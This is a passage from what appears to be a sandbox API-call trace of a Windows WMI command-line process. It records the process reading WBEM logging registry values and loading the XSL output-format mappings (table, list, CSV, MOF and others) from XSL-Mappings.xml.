(_Size=0x40) returned 0x3c6e70 [0248.424] malloc (_Size=0x20a) returned 0x3c6ec0 [0248.424] GetSystemDirectoryW (in: lpBuffer=0x3c6ec0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0248.424] free (_Block=0x3c6ec0) [0248.424] malloc (_Size=0x18) returned 0x3c6ec0 [0248.424] malloc (_Size=0x18) returned 0x3c6ee0 [0248.424] malloc (_Size=0x18) returned 0x3c6f00 [0248.424] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0248.424] SysStringLen (param_1="\\wbem\\") returned 0x6 [0248.424] free (_Block=0x3c6ec0) [0248.424] free (_Block=0x3c6ee0) [0248.424] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0248.424] free (_Block=0x3c6f00) [0248.424] malloc (_Size=0x18) returned 0x3c6ec0 [0248.424] malloc (_Size=0x18) returned 0x3c6ee0 [0248.424] malloc (_Size=0x18) returned 0x3c6f00 [0248.424] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0248.424] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0248.425] free (_Block=0x3c6ec0) [0248.425] free (_Block=0x3c6ee0) [0248.425] GetCurrentThreadId () returned 0x83c [0248.425] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x16eea0 | out: phkResult=0x16eea0*=0xf8) returned 0x0 [0248.425] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x16eef0, lpcbData=0x16ee90*=0x400 | out: lpType=0x0, lpData=0x16eef0*=0x30, lpcbData=0x16ee90*=0x4) returned 0x0 [0248.425] _wcsicmp (_String1="0", _String2="1") returned -1 [0248.425] _wcsicmp (_String1="0", _String2="2") returned -2 [0248.425] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x16ee90*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x16ee90*=0x42) returned 0x0 [0248.425] malloc (_Size=0x86) returned 0x3c6f20 [0248.425] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3c6f20, lpcbData=0x16ee90*=0x42 | out: lpType=0x0, lpData=0x3c6f20*=0x25, lpcbData=0x16ee90*=0x42) returned 0x0 [0248.425] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0248.425] malloc (_Size=0x42) returned 0x3c6fb0 [0248.425] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0248.425] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x16eef0, lpcbData=0x16ee90*=0x400 | out: lpType=0x0, lpData=0x16eef0*=0x36, lpcbData=0x16ee90*=0xc) returned 0x0 [0248.425] _wtol (_String="65536") returned 65536 [0248.425] free (_Block=0x3c6f20) [0248.426] RegCloseKey (hKey=0x0) returned 0x6 [0248.426] CoCreateInstance (in: rclsid=0xff697410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff6973f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f398 | out: ppv=0x16f398*=0x21671d0) returned 0x0 [0248.450] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21671d0, xmlSource=0x16f4e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x3c6ec0), isSuccessful=0x16f550 | out: isSuccessful=0x16f550*=0xffff) returned 0x0 [0248.616] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21671d0, DOMElement=0x16f390 | out: DOMElement=0x16f390*=0x216bc50) returned 0x0 [0248.617] malloc (_Size=0x18) returned 0x3c6ec0 [0248.617] IXMLDOMElement:getElementsByTagName (in: This=0x216bc50, tagName="XSLFORMAT", resultList=0x16f3a0 | out: resultList=0x16f3a0*=0x2169cc0) returned 0x0 [0248.618] free (_Block=0x3c6ec0) [0248.618] IXMLDOMNodeList:get_length (in: This=0x2169cc0, listLength=0x16f568 | out: listLength=0x16f568*=21) returned 0x0 [0248.619] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=0, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.619] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="texttable.xsl") returned 0x0 [0248.619] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.619] malloc (_Size=0x18) returned 0x3c6ec0 [0248.619] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.620] free (_Block=0x3c6ec0) [0248.620] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0248.620] malloc (_Size=0x18) returned 0x3c6ec0 [0248.620] malloc (_Size=0x18) returned 0x3c6ee0 [0248.620] malloc (_Size=0x30) returned 0x3c8080 [0248.620] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.620] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.620] IUnknown:Release (This=0x216a280) returned 0x0 [0248.620] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=1, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.620] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="textvaluelist.xsl") returned 0x0 [0248.620] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.620] malloc (_Size=0x18) returned 0x3c7110 [0248.620] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.620] free (_Block=0x3c7110) [0248.620] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0248.621] malloc (_Size=0x18) returned 0x3cc560 [0248.621] malloc (_Size=0x18) returned 0x3cc580 [0248.621] SysStringLen (param_1="VALUE") returned 0x5 [0248.621] SysStringLen (param_1="TABLE") returned 0x5 [0248.621] SysStringLen (param_1="TABLE") returned 0x5 [0248.621] SysStringLen (param_1="VALUE") returned 0x5 [0248.621] malloc (_Size=0x30) returned 0x3c80c0 [0248.621] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.621] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.621] IUnknown:Release (This=0x216a280) returned 0x0 [0248.621] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=2, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.621] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="textvaluelist.xsl") returned 0x0 [0248.621] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.621] malloc (_Size=0x18) returned 0x3cc5a0 [0248.621] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.621] free (_Block=0x3cc5a0) [0248.621] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0248.621] malloc (_Size=0x18) returned 0x3cc5a0 [0248.622] malloc (_Size=0x18) returned 0x3cc5c0 [0248.622] SysStringLen (param_1="LIST") returned 0x4 [0248.622] SysStringLen (param_1="TABLE") returned 0x5 [0248.622] malloc (_Size=0x30) returned 0x3c8100 [0248.622] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.622] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.622] IUnknown:Release (This=0x216a280) returned 0x0 [0248.622] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=3, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.622] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="rawxml.xsl") returned 0x0 [0248.622] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.622] malloc (_Size=0x18) returned 0x3cc5e0 [0248.622] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.622] free (_Block=0x3cc5e0) [0248.622] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0248.622] malloc (_Size=0x18) returned 0x3cc5e0 [0248.622] malloc (_Size=0x18) returned 0x3cc600 [0248.622] SysStringLen (param_1="RAWXML") returned 0x6 [0248.622] SysStringLen (param_1="TABLE") returned 0x5 [0248.622] SysStringLen (param_1="RAWXML") returned 0x6 [0248.622] SysStringLen (param_1="LIST") returned 0x4 [0248.623] SysStringLen (param_1="LIST") returned 0x4 [0248.623] SysStringLen (param_1="RAWXML") returned 0x6 [0248.623] malloc (_Size=0x30) returned 0x3c8140 [0248.623] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.623] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.623] IUnknown:Release (This=0x216a280) returned 0x0 [0248.623] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=4, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.623] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="htable.xsl") returned 0x0 [0248.623] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.623] malloc (_Size=0x18) returned 0x3cc620 [0248.623] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.623] free (_Block=0x3cc620) [0248.623] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0248.623] malloc (_Size=0x18) returned 0x3cc620 [0248.623] malloc (_Size=0x18) returned 0x3cc640 [0248.623] SysStringLen (param_1="HTABLE") returned 0x6 [0248.623] SysStringLen (param_1="TABLE") returned 0x5 [0248.623] SysStringLen (param_1="HTABLE") returned 0x6 [0248.623] SysStringLen (param_1="LIST") returned 0x4 [0248.623] malloc (_Size=0x30) returned 0x3c8180 [0248.624] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.624] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.624] IUnknown:Release (This=0x216a280) returned 0x0 [0248.624] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=5, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.624] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="hform.xsl") returned 0x0 [0248.624] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.624] malloc (_Size=0x18) returned 0x3cc660 [0248.624] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.624] free (_Block=0x3cc660) [0248.624] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0248.624] malloc (_Size=0x18) returned 0x3cc660 [0248.624] malloc (_Size=0x18) returned 0x3cc680 [0248.624] SysStringLen (param_1="HFORM") returned 0x5 [0248.624] SysStringLen (param_1="TABLE") returned 0x5 [0248.624] SysStringLen (param_1="HFORM") returned 0x5 [0248.624] SysStringLen (param_1="LIST") returned 0x4 [0248.624] SysStringLen (param_1="HFORM") returned 0x5 [0248.624] SysStringLen (param_1="HTABLE") returned 0x6 [0248.625] malloc (_Size=0x30) returned 0x3c81c0 [0248.625] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.625] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.625] IUnknown:Release (This=0x216a280) returned 0x0 [0248.625] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=6, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.625] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="xml.xsl") returned 0x0 [0248.625] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.625] malloc (_Size=0x18) returned 0x3cc6a0 [0248.625] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.625] free (_Block=0x3cc6a0) [0248.625] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0248.625] malloc (_Size=0x18) returned 0x3cc6a0 [0248.625] malloc (_Size=0x18) returned 0x3cc6c0 [0248.626] SysStringLen (param_1="XML") returned 0x3 [0248.626] SysStringLen (param_1="TABLE") returned 0x5 [0248.626] SysStringLen (param_1="XML") returned 0x3 [0248.626] SysStringLen (param_1="VALUE") returned 0x5 [0248.626] SysStringLen (param_1="VALUE") returned 0x5 [0248.626] SysStringLen (param_1="XML") returned 0x3 [0248.626] malloc (_Size=0x30) returned 0x3c8200 [0248.626] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.626] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.626] IUnknown:Release (This=0x216a280) returned 0x0 [0248.626] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=7, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.626] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="mof.xsl") returned 0x0 [0248.626] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.626] malloc (_Size=0x18) returned 0x3cc6e0 [0248.626] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.626] free (_Block=0x3cc6e0) [0248.627] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0248.627] malloc (_Size=0x18) returned 0x3cc6e0 [0248.627] malloc (_Size=0x18) returned 0x3cc700 [0248.627] SysStringLen (param_1="MOF") returned 0x3 [0248.627] SysStringLen (param_1="TABLE") returned 0x5 [0248.627] SysStringLen (param_1="MOF") returned 0x3 [0248.627] SysStringLen (param_1="LIST") returned 0x4 [0248.627] SysStringLen (param_1="MOF") returned 0x3 [0248.627] SysStringLen (param_1="RAWXML") returned 0x6 [0248.627] SysStringLen (param_1="LIST") returned 0x4 [0248.627] SysStringLen (param_1="MOF") returned 0x3 [0248.627] malloc (_Size=0x30) returned 0x3c8240 [0248.627] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.627] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.627] IUnknown:Release (This=0x216a280) returned 0x0 [0248.627] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=8, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.627] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="csv.xsl") returned 0x0 [0248.627] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.627] malloc (_Size=0x18) returned 0x3cc720 [0248.628] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.628] free (_Block=0x3cc720) [0248.628] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0248.628] malloc (_Size=0x18) returned 0x3cc720 [0248.628] malloc (_Size=0x18) returned 0x3cc740 [0248.628] SysStringLen (param_1="CSV") returned 0x3 [0248.628] SysStringLen (param_1="TABLE") returned 0x5 [0248.628] SysStringLen (param_1="CSV") returned 0x3 [0248.628] SysStringLen (param_1="LIST") returned 0x4 [0248.628] SysStringLen (param_1="CSV") returned 0x3 [0248.628] SysStringLen (param_1="HTABLE") returned 0x6 [0248.628] SysStringLen (param_1="CSV") returned 0x3 [0248.628] SysStringLen (param_1="HFORM") returned 0x5 [0248.628] malloc (_Size=0x30) returned 0x3c8280 [0248.628] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.628] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.628] IUnknown:Release (This=0x216a280) returned 0x0 [0248.629] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=9, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.629] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="texttable.xsl") returned 0x0 [0248.629] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.629] malloc (_Size=0x18) returned 0x3cc760 [0248.629] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.629] free (_Block=0x3cc760) [0248.629] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x4)) returned 0x0 [0248.629] malloc (_Size=0x18) returned 0x3cc760 [0248.629] malloc (_Size=0x18) returned 0x3cc780 [0248.629] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.629] SysStringLen (param_1="TABLE") returned 0x5 [0248.629] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.629] SysStringLen (param_1="VALUE") returned 0x5 [0248.629] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.629] SysStringLen (param_1="XML") returned 0x3 [0248.629] SysStringLen (param_1="XML") returned 0x3 [0248.630] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.630] malloc (_Size=0x30) returned 0x3c82c0 [0248.630] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.630] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.630] IUnknown:Release (This=0x216a280) returned 0x0 [0248.630] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=10, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.630] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="texttable.xsl") returned 0x0 [0248.630] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.630] malloc (_Size=0x18) returned 0x3cc7a0 [0248.630] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.630] free (_Block=0x3cc7a0) [0248.630] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x4)) returned 0x0 [0248.630] malloc (_Size=0x18) returned 0x3cc7a0 [0248.630] malloc (_Size=0x18) returned 0x3cc7c0 [0248.630] SysStringLen (param_1="texttablewsys") returned 0xd [0248.630] SysStringLen (param_1="TABLE") returned 0x5 [0248.630] SysStringLen (param_1="texttablewsys") returned 0xd [0248.630] SysStringLen (param_1="XML") returned 0x3 [0248.630] SysStringLen (param_1="texttablewsys") returned 0xd [0248.630] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.630] SysStringLen (param_1="XML") returned 0x3 [0248.631] SysStringLen (param_1="texttablewsys") returned 0xd [0248.631] malloc (_Size=0x30) returned 0x3c8300 [0248.631] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.631] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.631] IUnknown:Release (This=0x216a280) returned 0x0 [0248.631] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=11, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.631] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="texttable.xsl") returned 0x0 [0248.631] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.631] malloc (_Size=0x18) returned 0x3cc7e0 [0248.631] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.631] free (_Block=0x3cc7e0) [0248.631] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x4)) returned 0x0 [0248.631] malloc (_Size=0x18) returned 0x3cc7e0 [0248.631] malloc (_Size=0x18) returned 0x3cc800 [0248.631] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.631] SysStringLen (param_1="TABLE") returned 0x5 [0248.631] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.631] SysStringLen (param_1="XML") returned 0x3 [0248.631] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.631] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.631] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.632] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.632] malloc (_Size=0x30) returned 0x3c8340 [0248.632] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.632] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.632] IUnknown:Release (This=0x216a280) returned 0x0 [0248.632] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=12, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.632] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="texttable.xsl") returned 0x0 [0248.632] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.632] malloc (_Size=0x18) returned 0x3cc820 [0248.632] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.632] free (_Block=0x3cc820) [0248.632] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x4)) returned 0x0 [0248.632] malloc (_Size=0x18) returned 0x3cc820 [0248.632] malloc (_Size=0x18) returned 0x3cc840 [0248.632] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0248.632] SysStringLen (param_1="TABLE") returned 0x5 [0248.632] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0248.632] SysStringLen (param_1="XML") returned 0x3 [0248.632] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0248.632] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.633] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0248.633] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.633] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.633] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0248.633] malloc (_Size=0x30) returned 0x3c8380 [0248.633] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.633] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.633] IUnknown:Release (This=0x216a280) returned 0x0 [0248.633] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=13, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.633] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="texttable.xsl") returned 0x0 [0248.633] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.633] malloc (_Size=0x18) returned 0x3cc860 [0248.633] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.633] free (_Block=0x3cc860) [0248.633] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0248.633] malloc (_Size=0x18) returned 0x3cc860 [0248.633] malloc (_Size=0x18) returned 0x3cc880 [0248.633] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.634] SysStringLen (param_1="TABLE") returned 0x5 [0248.634] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.634] SysStringLen (param_1="XML") returned 0x3 [0248.634] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.634] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0248.634] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.634] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.634] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0248.634] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0248.634] malloc (_Size=0x30) returned 0x3c83c0 [0248.634] IUnknown:Release (This=0x216bd50) returned 0x0 [0248.634] IUnknown:Release (This=0x21678d0) returned 0x0 [0248.634] IUnknown:Release (This=0x216a280) returned 0x0 [0248.634] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=14, listItem=0x16f370 | out: listItem=0x16f370*=0x216bd50) returned 0x0 [0248.634] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x16f380 | out: text=0x16f380*="texttable.xsl") returned 0x0 [0248.634] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x16f378 | out: attributeMap=0x16f378*=0x21678d0) returned 0x0 [0248.634] malloc (_Size=0x18) returned 0x3cc8a0 [0248.634] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x16f388 | out: namedItem=0x16f388*=0x216a280) returned 0x0 [0248.634] free (_Block=0x3cc8a0) [0248.634] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x16f3c0 | out: value=0x16f3c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0248.635] malloc (_Size=0x18) returned 0x3cc8a0 [0248.635] malloc (_Size=0x18) returned 0x3cc8c0 [0248.635] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0248.635] SysStringLen (param_1="TABLE") returned 0x5 [0248.635] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0248.635] SysStringLen (param_1="XML") returned 0x3 [0248.635] SysStringLen 